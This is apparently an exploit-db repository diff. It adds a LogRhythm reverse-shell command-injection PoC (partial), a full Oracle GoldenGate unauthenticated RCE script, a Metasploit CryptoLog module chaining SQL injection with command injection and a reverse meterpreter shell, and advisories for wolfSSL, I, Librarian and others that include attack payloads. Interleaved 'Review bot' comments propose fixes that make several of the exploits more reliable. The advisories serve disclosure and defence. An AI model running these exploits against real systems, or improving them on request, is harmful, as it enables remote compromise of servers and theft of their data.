json_body["configurations"][5]["value"] = gwhost
|
||||
jwt = forge_jwt(rhost)
|
||||
auth_header = {'Token': jwt}
|
||||
print "[+] Initiating reverse shell via command injection at %s:%s" % (lhost, lport)
|
||||
requests.post(url=uri, json=json_body, headers=auth_header, verify=False)
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser(description='LogRhythm Network Monitor Root Remote Command Execution PoC')
|
||||
parser.add_argument('--rhost', help='RHOST IP address')
|
||||
parser.add_argument('--lhost', help='LHOST IP address')
|
||||
parser.add_argument('--lport', help='LPORT')
|
||||
parser.add_argument('--gwhost', help='Gateway IP address')
|
||||
parser.add_argument('--ifname', help='Target Interface Identifier', default='enp0s3')
|
||||
args = parser.parse_args()
|
||||
|
||||
command_inject(args.rhost, args.lhost, args.lport, args.gwhost, args.ifname)
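Review bot: none of the argparse options are marked required, so running the script without --rhost, --lhost, --lport or --gwhost does not fail early: forge_jwt() still succeeds and the request is sent to `https://None/data/api/configuration/` with None values in the JSON body. Add `required=True` to those four options, and check the `requests.post()` return value (currently discarded) so a non-2xx response, for example from a patched host, is reported instead of being silently treated as success. Smaller points: `forge_jwt(rhost)` never uses its argument; the local `jwt = forge_jwt(rhost)` in command_inject shadows the imported `jwt` module and only works because forge_jwt resolves the module through global scope; the Dependencies line names PyJWT but not `requests`, which is also imported; and the trailing semicolons on `exp = iat + 3600;` and `token = jwt.encode(...);` are leftovers from another language. For defenders, the significant fact documented here is the static HS512 signing key: a token minted with it carries role "admin" and is indistinguishable at the API from a legitimate session, so detection has to key on the configuration change itself (a netMask value containing shell metacharacters is not a valid netmask) rather than on authentication failures.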
|
||||
|
141
platforms/multiple/dos/41984.txt
Executable file
|
@ -0,0 +1,141 @@
|
|||
TALOS-2017-0293
|
||||
WOLFSSL LIBRARY X509 CERTIFICATE TEXT PARSING CODE EXECUTION VULNERABILITY
|
||||
MAY 8, 2017
|
||||
CVE-2017-2800
|
||||
|
||||
SUMMARY
|
||||
An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL library versions up to 3.10.2. A specially crafted x509 certificate can cause a single out of bounds byte overwrite resulting in potential certificate validation vulnerabilities, denial of service and possible remote code execution. In order to trigger this vulnerability, the attacker needs to supply a malicious x509 certificate to either server or client application using this library.
|
||||
|
||||
TESTED VERSIONS
|
||||
WolfSSL 3.10.2
|
||||
|
||||
PRODUCT URLS
|
||||
https://www.wolfssl.com
|
||||
|
||||
CVSSV3 SCORE
|
||||
8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
||||
CWE
|
||||
CWE-193: Off-by-one Error
|
||||
|
||||
DETAILS
|
||||
WolfSSL, previously CyaSSL, is a lightweight SSL/TLS library targeted for embedded and RTOS environments, primarily because of its small size, speed, portability, and feature set. According to the vendor it is used in wide range of products including industrial control systems, IoT devices, VoIP hardware, routers and more.
|
||||
|
||||
The vulnerability exists in x509 code that deals with string fields in DER certificates. Specifically, when parsing commonName, countryName, localityName, stateName, orgName or orgUnit fields, the function wolfSSL_X509_NAME_get_text_by_NID is used. Its prototype is:
|
||||
|
||||
int wolfSSL_X509_NAME_get_text_by_NID(WOLFSSL_X509_NAME* name, int nid, char* buf, int len);
|
||||
|
||||
Its task is to copy the appropriate string from name context into supplied buf of length len. The issue happens when the string is longer or equal to length of the allocated buffer.
|
||||
Following code highlights the issue for the case of commonName field:
|
||||
|
||||
|
||||
int wolfSSL_X509_NAME_get_text_by_NID(WOLFSSL_X509_NAME* name,
|
||||
int nid, char* buf, int len)
|
||||
{
|
||||
char *text = NULL;
|
||||
int textSz = 0;
|
||||
|
||||
|
||||
WOLFSSL_ENTER("wolfSSL_X509_NAME_get_text_by_NID");
|
||||
|
||||
|
||||
switch (nid) {
|
||||
case ASN_COMMON_NAME:
|
||||
text = name->fullName.fullName + name->fullName.cnIdx; [1]
|
||||
textSz = name->fullName.cnLen; [2]
|
||||
break;
|
||||
...
|
||||
|
||||
|
||||
if (buf != NULL && text != NULL) {
|
||||
textSz = min(textSz, len); [3]
|
||||
XMEMCPY(buf, text, textSz); [4]
|
||||
buf[textSz] = '\0'; [5]
|
||||
}
|
||||
|
||||
|
||||
At [1] and [2], text and textSz are initialized. At [3] the lesser of the two values textSz and len is chosen. This value ends up as the size parameter to a memcpy call at [4]. Then, the same value is used as an index to NULL terminate the string at [5]. If the string length is bigger than size of the allocated buffer, NULL termination at index textSz will cause an off-by-one NULL byte write into adjacent memory variable on the stack or heap, depending on where the buffer was allocated.
|
||||
|
||||
Depending on the way the library is used, this could lead to further issues when doing certificate validation or potentially result in remote code execution.
|
||||
The vulnerability can be triggered by supplying the attached PoC x509 certificate to the certfileds example app from wolfssl-examples.
|
||||
|
||||
CRASH INFORMATION
|
||||
Address sanitizer output:
|
||||
|
||||
==97602==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffe1a0 at pc 0x7ffff7b73f56 bp 0x7fffffff8410 sp 0x7fffffff8408
|
||||
WRITE of size 1 at 0x7fffffffe1a0 thread T0
|
||||
#0 0x7ffff7b73f55 in wolfSSL_X509_NAME_get_text_by_NID wolfssl/src/ssl.c:12458
|
||||
#1 0x7ffff7b73f55 in ?? ??:0
|
||||
#2 0x4ea99d in main wolfssl/wolfssl-examples/certfields/main.c:128
|
||||
#3 0x4ea99d in ?? ??:0
|
||||
#4 0x7ffff6afe82f in __libc_start_main /build/glibc-Qz8a69/glibc-2.23/csu/../csu/libc-start.c:291
|
||||
#5 0x7ffff6afe82f in ?? ??:0
|
||||
#6 0x418c48 in _start ??:?
|
||||
#7 0x418c48 in ?? ??:0
|
||||
|
||||
|
||||
Address 0x7fffffffe1a0 is located in stack of thread T0 at offset 23872 in frame
|
||||
#0 0x4ea2af in main wolfssl/wolfssl-examples/certfields/main.c:44
|
||||
#1 0x4ea2af in ?? ??:0
|
||||
|
||||
|
||||
This frame has 10 object(s):
|
||||
[32, 14128) 'derCert'
|
||||
[14384, 14388) 'idx'
|
||||
[14400, 23280) 'pubKey'
|
||||
[23536, 23544) 'cert'
|
||||
[23568, 23648) 'commonName'
|
||||
[23680, 23760) 'countryName'
|
||||
[23792, 23872) 'localityName' <== Memory access at offset 23872 overflows this variable
|
||||
[23904, 23984) 'stateName'
|
||||
[24016, 24096) 'orgName'
|
||||
[24128, 24208) 'orgUnit'
|
||||
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
|
||||
(longjmp and C++ exceptions *are* supported)
|
||||
SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/local/lib/libwolfssl.so.3+0x184f55)
|
||||
Shadow bytes around the buggy address:
|
||||
0x10007fff7be0: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2
|
||||
0x10007fff7bf0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
|
||||
0x10007fff7c00: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 f2 f2 f2 00 00
|
||||
0x10007fff7c10: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00
|
||||
0x10007fff7c20: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00
|
||||
=>0x10007fff7c30: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c40: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c50: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 f3 f3
|
||||
0x10007fff7c60: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10007fff7c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==97602==ABORTING
|
||||
|
||||
EXPLOIT PROOF-OF-CONCEPT
|
||||
A certificate that triggers this vulnerability can be generated using the following openssl command:
|
||||
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert1.pem -days 365 -subj "/C=US/ST=Maryland/L=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/O=E/CN=A"
|
||||
|
||||
CREDIT
|
||||
Discovered by Aleksandar Nikolic of Cisco Talos.
|
||||
|
||||
TIMELINE
|
||||
2017-03-14 - Vendor Disclosure
|
||||
2017-05-04 - Public Release
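Review bot: the advisory describes the off-by-one but names neither the fixed version nor the corrected bound; the SUMMARY says "versions up to 3.10.2" and TESTED VERSIONS repeats 3.10.2, so a reader cannot tell whether a release containing the fix exists. The correction follows directly from lines [3] to [5]: clamping with `min(textSz, len - 1)` keeps the terminator written at `buf[textSz]` inside the caller's buffer, and it is worth stating next to the CVSS score since the text already shows the copy length being reused as the terminator index. Two documentation nits: "certfileds example app" should read `certfields`, matching the path `wolfssl-examples/certfields/main.c` in the sanitizer trace; and the DETAILS paragraph refers to "the attached PoC x509 certificate" while nothing is attached to this entry, only the openssl command under EXPLOIT PROOF-OF-CONCEPT, whose long L= value is what overruns the 80-byte `localityName` buffer ([23792, 23872)) that the sanitizer reports.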
|
139
platforms/multiple/remote/41978.py
Executable file
|
@ -0,0 +1,139 @@
|
|||
#!/usr/bin/env python
|
||||
# Sources:
|
||||
# https://silentsignal.hu/docs/S2_Oracle_GoldenGate_GOLDENSHOWER.py
|
||||
# https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/
|
||||
#
|
||||
# GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal
|
||||
#
|
||||
# Tested with:
|
||||
# Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0_PLATFORMS_130924.1316 Linux, x64, 64bit (optimized) Oracle 11g
|
||||
# Version 12.1.2.0.0 17185003 OGGCORE_12.1.2.0.0T1_PLATFORMS_140313.1216 Windows x64 (optimized) Oracle 12c
|
||||
#
|
||||
# Nmap service fingerprint example:
|
||||
# ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)========
|
||||
# SF-Port7809-TCP:V=7.12%I=7%D=2/20%Time=DEADBEEF%P=x86_64-unknown-linux-gnu
|
||||
# SF:%r(RPCCheck,2D,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20th
|
||||
# SF:e\x20command\.\0")%r(DNSVersionBindReq,28,"\0&\x20\x20ERROR\tMGR\x20Did
|
||||
# SF:\x20Not\x20Recognize\x20Command\0")%r(DNSStatusRequest,28,"\0&\x20\x20E
|
||||
# SF:RROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(afp,28,"\0&\x20\x
|
||||
# SF:20ERROR\tMGR\x20Did\x20Not\x20Recognize\x20Command\0")%r(kumo-server,2D
|
||||
# SF:,"\0\+\x20\x20ERROR\tMGR\x20did\x20not\x20recognize\x20the\x20command\.
|
||||
# SF:\0");
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import argparse
|
||||
|
||||
HOST = None
|
||||
PORT = None
|
||||
PLATFORM = None
|
||||
|
||||
|
||||
def send_write(cmd):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
|
||||
term_ch = "#"
|
||||
if PLATFORM == "win":
|
||||
term_ch = "&"
|
||||
|
||||
cmd_ggsci = "GGSCI START OBEY x\nSHELL,%s %s " % (cmd, term_ch)
|
||||
cmd_ggsci = cmd_ggsci.replace(" ", "\x09")
|
||||
|
||||
length = struct.pack(">H", len(cmd_ggsci))
|
||||
s.send(length + cmd_ggsci)
|
||||
r = s.recv(1024)
|
||||
print "[+] '%s' WRITTEN \nReceived: %s\n" % (cmd, repr(r))
|
||||
|
||||
s.close()
|
||||
|
||||
|
||||
def send_exec():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
cmd = "GGSCI START OBEY ggserr.log".replace(" ", "\x09")
|
||||
length = struct.pack(">H", len(cmd))
|
||||
s.send(length + cmd)
|
||||
r = s.recv(1024)
|
||||
print "[+] EXECUTED - Received: %s\n" % (repr(r))
|
||||
s.close()
|
||||
|
||||
|
||||
def monitor():
|
||||
if PLATFORM == "win":
|
||||
print "[!] Windows platform detected, this may not work!"
|
||||
|
||||
import requests
|
||||
paths = ["messages", "registry", "statuschanges", "mpoints"]
|
||||
for p in paths:
|
||||
r = requests.get("http://%s:%d/%s" % (HOST, PORT, p))
|
||||
print "\n--- MONITOR - %s ---" % (p)
|
||||
print r.text
|
||||
|
||||
|
||||
def version():
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
#cmd = "GGSCI VERSION".replace(" ","\x09")
|
||||
cmd = "GGSCI\tVERSION"
|
||||
length = struct.pack(">H", len(cmd))
|
||||
s.send(length + cmd)
|
||||
r = s.recv(1024)
|
||||
ver = r[5:].replace("\t", " ")
|
||||
print "[+] VERSION: %s\n" % (ver)
|
||||
s.close()
|
||||
return ver
|
||||
|
||||
|
||||
def debug(cmd, l=None):
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
length = None
|
||||
if l is None:
|
||||
length = struct.pack(">H", len(cmd))
|
||||
else:
|
||||
length = struct.pack(">H", l)
|
||||
s.send(length + cmd)
|
||||
print "[+] Sent: %s" % (repr(length + cmd))
|
||||
r = s.recv(1024)
|
||||
print "[+] Received: %s\n" % (repr(r))
|
||||
s.close()
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description='GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal')
|
||||
parser.add_argument("--host", help="Target host")
|
||||
parser.add_argument("--port", help="Target port", type=int, default=7809)
|
||||
parser.add_argument("--cmd", help="Command(s) to execute", nargs='*')
|
||||
parser.add_argument(
|
||||
"--monitor", help="Dump information (incl. version) via HTTP monitoring functions", action="store_true")
|
||||
parser.add_argument("--debugcmd", help="Send raw content", required=False)
|
||||
parser.add_argument("--debuglen", help="Indicated size of raw content",
|
||||
type=int, default=None, required=False)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
HOST = args.host
|
||||
PORT = args.port
|
||||
|
||||
ver = version()
|
||||
|
||||
if "Windows" in ver:
|
||||
PLATFORM = "win"
|
||||
print "[+] Platform: Windows"
|
||||
else:
|
||||
PLATFORM = "nix"
|
||||
print "[+] Platform: *nix"
|
||||
|
||||
if args.cmd:
|
||||
for c in args.cmd:
|
||||
send_write(c)
|
||||
send_exec()
|
||||
|
||||
if args.monitor:
|
||||
monitor()
|
||||
|
||||
if args.debugcmd:
|
||||
debug(args.debugcmd, args.debuglen)
|
||||
|
||||
# Signature: aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj0wNHZINFdfOVJmZw==
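Review bot: `version()` runs unconditionally before any option is examined and `--host` is not required, so `s.connect((None, 7809))` is the first thing that fails when the script is run without arguments; make `--host` required and exit when none of --cmd, --monitor or --debugcmd is given. `version()` also trusts `r[5:]` without checking that a response arrived: an empty recv() (connection closed) or one of the `ERROR\tMGR ...` replies quoted in the Nmap fingerprint yields a string without "Windows", so PLATFORM silently falls back to "nix" and the wrong terminator character is chosen. send_write() deserves a comment that `cmd_ggsci.replace(" ", "\x09")` rewrites every space, including those inside the user-supplied --cmd, not only the protocol separators. The Nmap fingerprint in the header is the useful part for defenders: the `ERROR\tMGR did not recognize the command` banner on TCP/7809 is how to find manager ports reachable without authentication during an inventory. The trailing `# Signature:` line is a base64-encoded URL that serves no purpose in an exploit-db entry.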
|
167
platforms/php/webapps/41979.txt
Executable file
|
@ -0,0 +1,167 @@
|
|||
SEC Consult Vulnerability Lab Security Advisory < 20170509-0 >
|
||||
=======================================================================
|
||||
title: Multiple vulnerabilities
|
||||
product: I, Librarian PDF manager
|
||||
vulnerable version: <=4.6 & 4.7
|
||||
fixed version: 4.8
|
||||
CVE number: -
|
||||
impact: Critical
|
||||
homepage: https://i-librarian.net/
|
||||
found: 2017-01-30
|
||||
by: Wan Ikram (Office Kuala Lumpur)
|
||||
Fikri Fadzil (Office Kuala Lumpur)
|
||||
Jasveer Singh (Office Kuala Lumpur)
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
An integrated part of SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
|
||||
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
https://www.sec-consult.com
|
||||
|
||||
=======================================================================
|
||||
|
||||
Vendor description:
|
||||
-------------------
|
||||
"I, Librarian is a PDF manager or PDF organizer, which enables researchers,
|
||||
scholars, or students to create an annotated collection of PDF articles. If
|
||||
used as a groupware, users may build their virtual library collaboratively,
|
||||
sharing the workload of literature mining. I, Librarian will make your work
|
||||
with scientific literature incredibly efficient."
|
||||
|
||||
Source: https://i-librarian.net/
|
||||
|
||||
|
||||
Business recommendation:
|
||||
------------------------
|
||||
By combining the vulnerabilities documented in this advisory an attacker can
|
||||
fully compromise the web server which has the "I, Librarian" software installed.
|
||||
|
||||
SEC Consult recommends to install the latest version available immediately and
|
||||
perform a thorough security review of this software.
|
||||
|
||||
|
||||
Vulnerability overview/description:
|
||||
-----------------------------------
|
||||
The application doesn't apply proper validation on some user inputs. As a
|
||||
result, below vulnerabilities can be exploited by authenticated attackers with
|
||||
any roles to fully compromise the system.
|
||||
|
||||
1. OS Command Injection
|
||||
Arbitrary OS commands are possible to be executed from "batchimport.php". This
|
||||
is a serious vulnerability as the chances for the web server to be fully
|
||||
compromised are very high.
|
||||
|
||||
2. Server-Side Request Forgery
|
||||
This vulnerability allows an attacker to send HTTP requests originating from the
|
||||
web server. As some functions in the web application require requests to
|
||||
be done from localhost, the risk for this vulnerability is considered high.
|
||||
|
||||
3. Directory Enumeration
|
||||
It is possible to enumerate all directories in any directory on the server through
|
||||
"jqueryFileTree.php".
|
||||
|
||||
4. Reflected Cross Site Scripting
|
||||
This vulnerability was found in "temp.php". It allows an attacker to inject
|
||||
malicious client side scripting which will be executed in the browser of users
|
||||
if they visit the manipulated site.
|
||||
|
||||
|
||||
Proof of concept:
|
||||
-----------------
|
||||
1. OS Command Injection
|
||||
Below is the detail of a HTTP request that needs to be sent to execute arbitrary
|
||||
OS commands through "batchimport.php":
|
||||
|
||||
URL : http://$DOMAIN/batchimport.php
|
||||
METHOD : GET
|
||||
PAYLOAD : directory=.&commence=&user="||<os-commands-here>||"
|
||||
|
||||
|
||||
2. Server-Side Request Forgery
|
||||
Below shows an example of the exploitation for this vulnerability. An attacker
|
||||
can reset any user's password which by design requires the request to be sent
|
||||
from localhost.
|
||||
|
||||
URL : http://$DOMAIN/ajaxsupplement.php
|
||||
METHOD : POST
|
||||
PAYLOAD :
|
||||
form_new_file_link=http://$DOMAIN/resetpassword.php?username=<username>&new_password1=<new-password>&new_password2=<new-password>
|
||||
|
||||
|
||||
3. Directory Enumeration
|
||||
Available directories can be enumerated simply by navigating through the "dir"
|
||||
parameter in "jqueryFileTree.php".
|
||||
|
||||
URL : http://$DOMAIN/jqueryFileTree.php
|
||||
METHOD : POST
|
||||
PAYLOAD : dir=<path-to-directory>
|
||||
|
||||
|
||||
4. Reflected Cross Site Scripting
|
||||
The following payload shows a simple alert message box:
|
||||
URL : http://$DOMAIN/temp.php
|
||||
METHOD : GET
|
||||
PAYLOAD : tempfile=<script>alert(42)</script>
|
||||
|
||||
|
||||
Vulnerable / tested versions:
|
||||
-----------------------------
|
||||
"I, Librarian" version 4.6 has been tested. This version was the latest
|
||||
at the time the security vulnerabilities were discovered. It is assumed
|
||||
that previous versions are affected as well.
|
||||
|
||||
|
||||
Vendor contact timeline:
|
||||
------------------------
|
||||
2017-01-31: Contacting vendor through support@i-librarian.net
|
||||
2017-01-31: Vendor replied with their PGP public key.
|
||||
2017-02-03: Provided encrypted advisory and proof of concept to the vendor.
|
||||
2017-02-09: Patch released, version 4.7.
|
||||
2017-02-21: Informed vendor on some issues which were not addressed correctly.
|
||||
2017-03-30: Patch released by the vendor - I, Librarian version 4.8.
|
||||
2017-05-09: Public release of advisory
|
||||
|
||||
|
||||
Solution:
|
||||
---------
|
||||
Upgrade to I, Librarian 4.8
|
||||
|
||||
For further information see:
|
||||
https://i-librarian.net/article.php?id=9
|
||||
|
||||
|
||||
Workaround:
|
||||
-----------
|
||||
None
|
||||
|
||||
|
||||
Advisory URL:
|
||||
-------------
|
||||
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
|
||||
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
SEC Consult Vulnerability Lab
|
||||
|
||||
SEC Consult
|
||||
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
|
||||
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
|
||||
|
||||
About SEC Consult Vulnerability Lab
|
||||
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
|
||||
ensures the continued knowledge gain of SEC Consult in the field of network
|
||||
and application security to stay ahead of the attacker. The SEC Consult
|
||||
Vulnerability Lab supports high-quality penetration testing and the evaluation
|
||||
of new offensive and defensive technologies for our customers. Hence our
|
||||
customers obtain the most current information about vulnerabilities and valid
|
||||
recommendation about the risk profile of new technologies.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
Interested to work with the experts of SEC Consult?
|
||||
Send us your application https://www.sec-consult.com/en/Career.htm
|
||||
|
||||
Interested in improving your cyber security with the experts of SEC Consult?
|
||||
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
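Review bot: the Workaround section says "None", yet every issue in the proof-of-concept section is reached through a small set of named scripts (batchimport.php, ajaxsupplement.php, jqueryFileTree.php, temp.php), so a web-server-level access restriction on those paths is a reasonable interim measure to document for installations that cannot move to 4.8 immediately. The overview says the issues require "authenticated attackers with any roles", but the SSRF example shows resetpassword.php accepting a password change purely because the request originates from localhost; that trust in source address is the underlying weakness and deserves its own sentence, so readers can check whether 4.8 replaced it with a real authorization check rather than only filtering the link parameter. Minor: "Vulnerable / tested versions" says only 4.6 was tested while the header lists "<=4.6 & 4.7" as vulnerable; the timeline explains that 4.7 left some issues unaddressed, and the versions section should say so as well. Grammar: "Arbitrary OS commands are possible to be executed" reads better as "Arbitrary OS commands can be executed", and "the detail of a HTTP request" as "an HTTP request".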
|
112
platforms/python/remote/41980.rb
Executable file
|
@ -0,0 +1,112 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Crypttech CryptoLog Remote Code Execution",
|
||||
'Description' => %q{
|
||||
This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
|
||||
terminal command under the context of the web user.
|
||||
|
||||
login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
|
||||
and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
|
||||
|
||||
logshares_ajax.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having
|
||||
a valid session. One user parameter is used by the application while executing operating system command which cause a command injection issue.
|
||||
|
||||
Combining these vulnerabilities gives us opportunity execute operation system command under the context of the web user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'Payload' => 'python/meterpreter/reverse_tcp'
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 3 2017",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def bypass_login
|
||||
r = rand_text_alpha(15)
|
||||
i = rand_text_numeric(5)
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
|
||||
'vars_get' => {
|
||||
'act' => 'login'
|
||||
},
|
||||
'vars_post' => {
|
||||
'user' => "' OR #{i}=#{i}#",
|
||||
'pass' => "#{r}"
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 302 && res.headers.include?('Set-Cookie')
|
||||
res.get_cookies
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
if bypass_login.nil?
|
||||
Exploit::CheckCode::Safe
|
||||
else
|
||||
Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Bypassing login by exploiting SQLi flaw")
|
||||
|
||||
cookie = bypass_login
|
||||
|
||||
if cookie.nil?
|
||||
fail_with(Failure::Unknown, "Something went wrong.")
|
||||
end
|
||||
|
||||
print_good("Successfully logged in")
|
||||
|
||||
print_status("Exploiting command injection flaw")
|
||||
r = rand_text_alpha(15)
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
|
||||
'cookie' => cookie,
|
||||
'vars_post' => {
|
||||
'opt' => "check",
|
||||
'lsid' => "$(python -c \"#{payload.encoded}\")",
|
||||
'lssharetype' => "#{r}"
|
||||
}
|
||||
})
|
||||
|
||||
end
|
||||
end
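Review bot: `check` is not side-effect free: it calls bypass_login, which performs the real SQL-injection login and receives a valid session cookie from the target, so a plain `check` run leaves a session on the appliance and in its logs; the module description should say so, or `check` should be reduced to a probe that does not complete the login. In `exploit`, the `send_request_cgi` result for logshares_ajax.php is discarded, so a 403 or a redirect back to login.php (cookie rejected, patched instance) is reported no differently from success; capture `res` and `fail_with` on a non-200. The `lsid` value wraps `payload.encoded` in `$(python -c \"...\")`, which assumes the encoded Python payload contains no double quotes; that assumption should be documented. `Failure::Unknown` with "Something went wrong." for a failed login would be clearer as `Failure::NoAccess` with a message naming the login bypass. The Description also needs an edit: "Successfully exploitation" should be "Successful exploitation", "Which cause a sql injection vulnerability." is a sentence fragment, and "gives us opportunity execute operation system command" should read "gives an attacker the opportunity to execute operating system commands".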
|
|
@ -6,6 +6,7 @@
|
|||
# Contact: https://www.linkedin.com/in/majidalqabandi/
|
||||
# CVE: CVE-2017-6953
|
||||
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
|
||||
# Vendor notified: 17-04-2016
|
||||
|
||||
1. Description
|
||||
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
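Review bot: the "Vendor notified" date reads 17-04-2016, a full year before the CVE-2017-6953 identifier in the header, and the day-month-year order is ambiguous; confirm whether 2017 is meant and write it as an ISO date (2017-04-17) so the disclosure timeline can be read against the CVE year. The Description line "SymDiag.exe is vulnerable to buffer overflow, SEH overwrite." names no affected version and no input vector; since the header now carries a CVE, at least point to the vendor advisory for the affected versions.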
|
||||
|
|
129
platforms/windows/remote/41975.txt
Executable file
|
@ -0,0 +1,129 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5
|
||||
|
||||
MsMpEng is the Malware Protection service that is enabled by default on Windows 8, 8.1, 10, Windows Server 2012, and so on. Additionally, Microsoft Security Essentials, System Centre Endpoint Protection and various other Microsoft security products share the same core engine. MsMpEng runs as NT AUTHORITY\SYSTEM without sandboxing, and is remotely accessible without authentication via various Windows services, including Exchange, IIS, and so on.
|
||||
|
||||
On workstations, attackers can access mpengine by sending emails to users (reading the email or opening attachments is not necessary), visiting links in a web browser, instant messaging and so on. This level of accessibility is possible because MsMpEng uses a filesystem minifilter to intercept and inspect all system filesystem activity, so writing controlled contents to anywhere on disk (e.g. caches, temporary internet files, downloads (even unconfirmed downloads), attachments, etc) is enough to access functionality in mpengine. MIME types and file extensions are not relevant to this vulnerability, as MsMpEng uses it's own content identification system.
|
||||
|
||||
Vulnerabilities in MsMpEng are among the most severe possible in Windows, due to the privilege, accessibility, and ubiquity of the service.
|
||||
